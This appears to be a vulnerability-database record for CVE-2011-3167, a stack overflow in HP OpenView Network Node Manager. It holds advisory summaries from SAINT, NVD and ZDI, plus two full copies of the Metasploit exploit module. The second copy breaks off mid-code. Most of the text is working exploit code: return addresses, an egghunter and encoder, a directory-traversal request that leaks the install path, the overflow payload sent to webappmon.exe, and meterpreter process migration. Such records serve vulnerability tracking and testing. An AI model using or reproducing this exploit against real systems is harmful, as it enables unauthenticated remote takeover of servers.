HP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP.
Problem
User supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server.
Resolution
No patches are available at this time. Restrict access to the web interface of the NNM server.
This exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802.
Platforms
Windows
{"id": "SAINT:AB5617474F7BE9B629ADCCF2D88D5092", "bulletinFamily": "exploit", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\n### Platforms\n\nWindows \n \n\n", "published": "2012-02-20T00:00:00", "modified": "2012-02-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2011-3167"], "type": "saint", "lastseen": "2019-06-04T23:19:36", "edition": 4, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3167"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108874"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27279", "SECURITYVULNS:VULN:12023", "SECURITYVULNS:DOC:27517"]}, {"type": "saint", "idList": ["SAINT:9AD3CB68986F0A2E9C3BCB4A4E9FB1A5", "SAINT:1B3DC2DC93CA32D821F922E364385055"]}, {"type": "exploitdb", "idList": ["EDB-ID:18388"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVBUILDPATH_TEXTFILE"]}, {"type": "zdi", "idList": ["ZDI-12-002"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103364"]}, {"type": "nessus", "idList": ["HP_NNM_MULTIPLE_CODE_EXECUTION.NASL"]}], "modified": "2019-06-04T23:19:36", "rev": 2}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-06-04T23:19:36", "rev": 2}, "vulnersScore": 9.1}, "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:05", "description": "Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-1210.", "edition": 4, "cvss3": {}, "published": "2011-11-02T17:55:00", "title": "CVE-2011-3167", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3167"], "modified": "2012-02-15T04:09:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2011-3167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3167", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "edition": 2, "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-02-20T00:00:00", "published": "2012-02-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "id": "SAINT:1B3DC2DC93CA32D821F922E364385055", "type": "saint", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "description": "Added: 02/20/2012 \nCVE: [CVE-2011-3167](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3167>) \nBID: [50471](<http://www.securityfocus.com/bid/50471>) \nOSVDB: [76775](<http://www.osvdb.org/76775>) \n\n\n### Background\n\nHP OpenView Network Node Manager (NNM) is a network monitoring solution based on SNMP. \n\n### Problem\n\nUser supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overflow vulnerability that may allow an unauthenticated attacker to take control of the server. \n\n### Resolution\n\nNo patches are available at this time. Restrict access to the web interface of the NNM server. \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03054052> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-002/> \n<http://www.zerodayinitiative.com/advisories/ZDI-12-003/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Network Node Manager 7.53 on Windows Server 2003 SP2 English (DEP OptOut) with KB956802 and KB2393802. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-02-20T00:00:00", "published": "2012-02-20T00:00:00", "id": "SAINT:9AD3CB68986F0A2E9C3BCB4A4E9FB1A5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_ovbuildpath", "type": "saint", "title": "HP OpenView Network Node Manager OVBuildPath Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:38:39", "description": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow. CVE-2011-3167. Remote exploit for windows platform", "published": "2012-01-20T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2012-01-20T00:00:00", "id": "EDB-ID:18388", "href": "https://www.exploit-db.com/exploits/18388/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Egghunter\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node\r\n\t\t\t\tManager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\r\n\t\t\t\t'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\r\n\t\t\t\tcause a stack-based buffer overflow and execute arbitrary code.\r\n\r\n\t\t\t\tThe vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\r\n\t\t\t\tare no stack cookies, so exploitation is achieved by overwriting the saved return\r\n\t\t\t\taddress.\r\n\r\n\t\t\t\tThe vulnerability is due to the use of the function \"_OVConcatPath\" which finally\r\n\t\t\t\tuses \"strcat\" in a insecure way. User controlled data is concatenated to a string\r\n\t\t\t\twhich contains the OpenView installation path.\r\n\r\n\t\t\t\tTo achieve reliable exploitation a directory traversal in OpenView5.exe\r\n\t\t\t\t(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\r\n\t\t\t\tpath. If the installation path cannot be guessed the default installation path\r\n\t\t\t\tis used.\r\n\t\t\t} ,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery\r\n\t\t\t\t\t'juan vazquez', # Metasploit module\r\n\t\t\t\t\t'sinn3r' # Metasploit fu\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-3167' ],\r\n\t\t\t\t\t[ 'OSVDB', '76775' ],\r\n\t\t\t\t\t[ 'BID', '50471' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],\r\n\t\t\t\t\t[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload'\t =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 950,\r\n\t\t\t\t\t'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"),\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'EDI' # Egghunter jmp edi\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets'\t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',\r\n\t\t\t\t\t\t# Patches installed:\r\n\t\t\t\t\t\t# * ECS_00048\r\n\t\t\t\t\t\t# * NNM_01128\r\n\t\t\t\t\t\t# * NNM_01172\r\n\t\t\t\t\t\t# * NNM_01187\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1067,\r\n\t\t\t\t\t\t\t'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)\r\n\t\t\t\t\t\t\t'JmpESP' => 0x5a4251c5, # call esp - in ov.dll\r\n\t\t\t\t\t\t\t'EggAdjust' => 4,\r\n\t\t\t\t\t\t\t'ReadableAddress' => 0x5a466930 # ov.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 01 2011'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# The following code allows to migrate if having into account\r\n\t# that over Windows XP permissions aren't granted on %windir%\\system32\r\n\t#\r\n\t# Code ripped from \"modules/post/windows/manage/migrate.rb\". See it\r\n\t# for more information\r\n\tdef on_new_session(client)\r\n\r\n\t\tif client.type != \"meterpreter\"\r\n\t\t\tprint_error(\"NOTE: you must use a meterpreter payload in order to process migration.\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\r\n\r\n\t\t# Select path and executable to run depending the architecture\r\n\t\t# and the operating system\r\n\t\tif client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/\r\n\t\t\twindir = client.fs.file.expand_path(\"%ProgramFiles%\")\r\n\t\t\tcmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\"\r\n\t\telse # Windows 2000\r\n\t\t\twindir = client.fs.file.expand_path(\"%windir%\")\r\n\t\t\tif client.sys.config.sysinfo['Architecture'] =~ /x86/\r\n\t\t\t\tcmd = \"#{windir}\\\\System32\\\\notepad.exe\"\r\n\t\t\telse\r\n\t\t\t\tcmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\"\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# run hidden\r\n\t\tprint_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\")\r\n\t\tproc = client.sys.process.execute(cmd, nil, {'Hidden' => true })\r\n\t\ttarget_pid = proc.pid\r\n\r\n\t\tbegin\r\n\t\t\tprint_good(\"Migrating to #{target_pid}\")\r\n\t\t\tclient.core.migrate(target_pid)\r\n\t\t\tprint_good(\"Successfully migrated to process #{target_pid}\")\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_error(\"Could not migrate in to process.\")\r\n\t\t\tprint_error(e.to_s)\r\n\t\tend\r\n\r\n\tend\r\n\r\n\t# Tries to guess the HP OpenView install dir via the Directory traversal identified\r\n\t# by OSVDB 44359.\r\n\t# If OSVDB 44359 doesn't allow to retrieve the installation path the default one\r\n\t# (C:\\Program Files\\HP OpenView\\) is used.\r\n\t# Directory Traversal used:\r\n\t# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log\r\n\tdef get_install_path\r\n\r\n\t\tcgi = '/OvCgi/OpenView5.exe'\r\n\t\tweb_session = rand_text_numeric(3)\r\n\t\tmy_cookie = \"OvOSLocale=English_United States.1252; \"\r\n\t\tmy_cookie << \"OvAcceptLang=en-US; \"\r\n\t\tmy_cookie << \"OvJavaLocale=en_US.Cp1252; \"\r\n\t\tmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\r\n\r\n\t\tpayload = \"../../../log/setup.log\"\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => cgi,\r\n\t\t\t'cookie' => my_cookie,\r\n\t\t\t'method'\t => \"GET\",\r\n\t\t\t'vars_get' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Target' => \"Main\",\r\n\t\t\t\t\t'Scope' => \"Snmp\",\r\n\t\t\t\t\t'Action' => payload\r\n\t\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\tinstallation_path = \"\"\r\n\t\tif res and res.code == 200 and\r\n\t\t\t\tres.body =~ /([A-Z]:\\\\.*\\\\)log/\r\n\t\t\tprint_status(\"Installation Path Found in #{$1}\")\r\n\t\t\tinstallation_path = $1\r\n\t\telse\r\n\t\t\tprint_status(\"Installation Path Not Found using the default\")\r\n\t\t\tinstallation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\"\r\n\t\tend\r\n\r\n\t\treturn installation_path\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tinstall_path = get_install_path\r\n\t\tinstall_path << \"help\\\\English_United States.1252\"\r\n\r\n\t\teggoptions = {\r\n\t\t\t:checksum => true,\r\n\t\t}\r\n\t\thunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\r\n\r\n\t\t[ 'x86/alpha_mixed'].each { |name|\r\n\t\t\tenc = framework.encoders.create(name)\r\n\t\t\tif name =~/alpha/\r\n\t\t\t\t# If control is transferred to the decoder via \"call esp\" BufferOfset\r\n\t\t\t\t# shoulds be adjusted.\r\n\t\t\t\tif target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0\r\n\t\t\t\t\tenc_options = {\r\n\t\t\t\t\t\t'BufferRegister' => 'ESP',\r\n\t\t\t\t\t\t'BufferOffset' => target[\"EggAdjust\"]\r\n\t\t\t\t\t}\r\n\t\t\t\t\tenc.datastore.import_options_from_hash(enc_options)\r\n\t\t\t\telse\r\n\t\t\t\t\tenc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\thunter = enc.encode(hunter, nil, nil, platform)\r\n\t\t}\r\n\r\n\t\toffset = target['Offset'] - install_path.length - egg.length\r\n\r\n\t\tmy_payload = egg\r\n\t\tmy_payload << rand_text_alphanumeric(offset)\r\n\t\tmy_payload << [target.ret].pack(\"V\")\r\n\t\tmy_payload << rand_text_alphanumeric(4) # Padding\r\n\t\tmy_payload << [target[\"ReadableAddress\"]].pack(\"V\")\r\n\t\tmy_payload << [target[\"JmpESP\"]].pack(\"V\")\r\n\t\tmy_payload << hunter\r\n\r\n\t\tbuf = \"-textFile+#{my_payload}+++++++++++++++++++++++\"\r\n\t\tbuf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\"\r\n\t\tbuf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\"\r\n\t\tbuf << \"-dataLine+2+\"\r\n\t\tbuf << \"-commandTitle+%22Services%22+%09%09++++++\"\r\n\t\tbuf << \"-iconName+%22Services%22+++++++++++++++++++++++\"\r\n\t\tbuf << \"-cmd+rnetstat+\"\r\n\t\tbuf << \"-S\"\r\n\r\n\t\tweb_session = rand_text_numeric(3)\r\n\t\tmy_cookie = \"OvOSLocale=English_United States.1252; \"\r\n\t\tmy_cookie << \"OvAcceptLang=en-US; \"\r\n\t\tmy_cookie << \"OvJavaLocale=en_US.Cp1252; \"\r\n\t\tmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\r\n\r\n\t\tcgi = '/OvCgi/webappmon.exe'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => cgi,\r\n\t\t\t'cookie' => my_cookie,\r\n\t\t\t'method' => \"POST\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ins' => 'nowait',\r\n\t\t\t\t\t'sel' => rand_text_alphanumeric(15),\r\n\t\t\t\t\t'app' => 'IP Tables',\r\n\t\t\t\t\t'act' => 'Services',\r\n\t\t\t\t\t'help' => '',\r\n\t\t\t\t\t'cache' => rand_text_numeric(4)\r\n\t\t\t\t},\r\n\t\t\t'data' => \"arg=#{buf}\" # Avoid uri encoding\r\n\t\t}, 3)\r\n\r\n\t\tif res and res.code != 502\r\n\t\t\tprint_error(\"Eek! We weren't expecting a response, but we got one\")\r\n\t\t\tif datastore['DEBUG']\r\n\t\t\t\tprint_line()\r\n\t\t\t\tprint_error(res.inspect)\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n\r\n=begin\r\n\r\n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3\r\n\r\nmeterpreter > run post/windows/manage/migrate\r\n\r\n[*] Running module against HOME-F006222D6C\r\n[*] Current server process: webappmon.exe (7064)\r\n[*] Spawning notepad.exe process to migrate to\r\n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.\r\n[-] Call stack:\r\n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'\r\n[-] (eval):80:in `create_temp_proc'\r\n[-] (eval):49:in `run'\r\n=end", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18388/"}], "zdi": [{"lastseen": "2020-06-22T11:40:55", "bulletinFamily": "info", "cvelist": ["CVE-2011-3167"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within ov.dll. When processing a user supplied file name for the textFile option, there exists an insufficient boundary check before supplying the value to a format string within _OVBuildPath, causing a stack overflow. This can lead to memory corruption which can be leveraged to execute arbitrary code under the context of the target service.", "modified": "2012-06-22T00:00:00", "published": "2012-01-05T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-002/", "id": "ZDI-12-002", "title": "HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:54:20", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There are no stack cookies, so exploitation is achieved by overwriting the saved return address. The vulnerability is due to the use of the function \"_OVConcatPath\" which finally uses \"strcat\" in an insecure way. User controlled data is concatenated to a string which contains the OpenView installation path. To achieve reliable exploitation a directory traversal in OpenView5.exe (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation path. If the installation path cannot be guessed the default installation path is used.\n", "published": "2012-01-18T18:05:18", "type": "metasploit", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVBUILDPATH_TEXTFILE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Egghunter\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.\n } ,\n 'Author' =>\n [\n 'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery\n 'juan vazquez', # Metasploit module\n 'sinn3r' # Metasploit fu\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-3167' ],\n [ 'OSVDB', '76775' ],\n [ 'BID', '50471' ],\n [ 'ZDI', '12-002' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]\n ],\n 'Payload'\t =>\n {\n 'Space' => 950,\n 'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"),\n 'DisableNops' => true,\n 'EncoderOptions' =>\n {\n 'BufferRegister' => 'EDI' # Egghunter jmp edi\n }\n },\n 'Platform' => 'win',\n 'Targets'\t =>\n [\n [ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',\n # Patches installed:\n # * ECS_00048\n # * NNM_01128\n # * NNM_01172\n # * NNM_01187\n {\n 'Offset' => 1067,\n 'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)\n 'JmpESP' => 0x5a4251c5, # call esp - in ov.dll\n 'EggAdjust' => 4,\n 'ReadableAddress' => 0x5a466930 # ov.dll\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2011-11-01'))\n\n self.needs_cleanup = true\n end\n\n # The following code allows to migrate if having into account\n # that over Windows XP permissions aren't granted on %windir%\\system32\n #\n # Code ripped from \"modules/post/windows/manage/migrate.rb\". See it\n # for more information\n def on_new_session(client)\n\n if client.type != \"meterpreter\"\n print_error(\"NOTE: you must use a meterpreter payload in order to process migration.\")\n return\n end\n\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\n # Use the system path for executable to run except the wordpad\n if client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/\n windir = client.sys.config.getenv('ProgramFiles')\n cmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\"\n else # Windows 2000\n cmd = \"notepad.exe\"\n end\n\n # run hidden\n print_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\")\n proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })\n target_pid = proc.pid\n\n begin\n print_good(\"Migrating to #{target_pid}\")\n client.core.migrate(target_pid)\n print_good(\"Successfully migrated to process #{target_pid}\")\n rescue ::Exception => e\n print_error(\"Could not migrate in to process.\")\n print_error(e.to_s)\n end\n\n end\n\n # Tries to guess the HP OpenView install dir via the Directory traversal identified\n # by OSVDB 44359.\n # If OSVDB 44359 doesn't allow to retrieve the installation path the default one\n # (C:\\Program Files\\HP OpenView\\) is used.\n # Directory Traversal used:\n # http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log\n def get_install_path\n\n cgi = '/OvCgi/OpenView5.exe'\n web_session = rand_text_numeric(3)\n my_cookie = \"OvOSLocale=English_United States.1252; \"\n my_cookie << \"OvAcceptLang=en-US; \"\n my_cookie << \"OvJavaLocale=en_US.Cp1252; \"\n my_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\n\n payload = \"../../../log/setup.log\"\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'cookie' => my_cookie,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'Target' => \"Main\",\n 'Scope' => \"Snmp\",\n 'Action' => payload\n }\n }, 5)\n\n installation_path = \"\"\n if res and res.code == 200 and\n res.body =~ /([A-Z]:\\\\.*\\\\)log/\n print_status(\"Installation Path Found in #{$1}\")\n installation_path = $1\n else\n print_status(\"Installation Path Not Found using the default\")\n installation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\"\n end\n\n return installation_path\n end\n\n def exploit\n print_status(\"Trying target #{target.name}...\")\n\n install_path = get_install_path\n install_path << \"help\\\\English_United States.1252\"\n\n eggoptions = {\n :checksum => true,\n }\n hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)\n\n [ 'x86/alpha_mixed'].each { |name|\n enc = framework.encoders.create(name)\n if name =~/alpha/\n # If control is transferred to the decoder via \"call esp\" BufferOfset\n # shoulds be adjusted.\n if target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0\n enc_options = {\n 'BufferRegister' => 'ESP',\n 'BufferOffset' => target[\"EggAdjust\"]\n }\n enc.datastore.import_options_from_hash(enc_options)\n else\n enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })\n end\n end\n hunter = enc.encode(hunter, nil, nil, platform)\n }\n\n offset = target['Offset'] - install_path.length - egg.length\n\n my_payload = egg\n my_payload << rand_text_alphanumeric(offset)\n my_payload << [target.ret].pack(\"V\")\n my_payload << rand_text_alphanumeric(4) # Padding\n my_payload << [target[\"ReadableAddress\"]].pack(\"V\")\n my_payload << [target[\"JmpESP\"]].pack(\"V\")\n my_payload << hunter\n\n buf = \"-textFile+#{my_payload}+++++++++++++++++++++++\"\n buf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\"\n buf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\"\n buf << \"-dataLine+2+\"\n buf << \"-commandTitle+%22Services%22+%09%09++++++\"\n buf << \"-iconName+%22Services%22+++++++++++++++++++++++\"\n buf << \"-cmd+rnetstat+\"\n buf << \"-S\"\n\n web_session = rand_text_numeric(3)\n my_cookie = \"OvOSLocale=English_United States.1252; \"\n my_cookie 